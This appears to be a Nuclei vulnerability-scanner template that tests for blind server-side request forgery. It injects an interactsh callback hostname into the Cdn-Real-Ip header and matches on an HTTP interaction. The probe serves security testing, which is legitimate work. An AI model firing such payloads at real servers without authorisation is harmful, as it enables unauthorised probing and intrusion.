id: 0x033

info:
  name: Blind SSRF
  author: 0xAwali
  severity: low

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cdn-Real-Ip: {{Host}}.{{Port}}.BSSRF-033.{{interactsh-url}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Cache-Control: no-transform
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"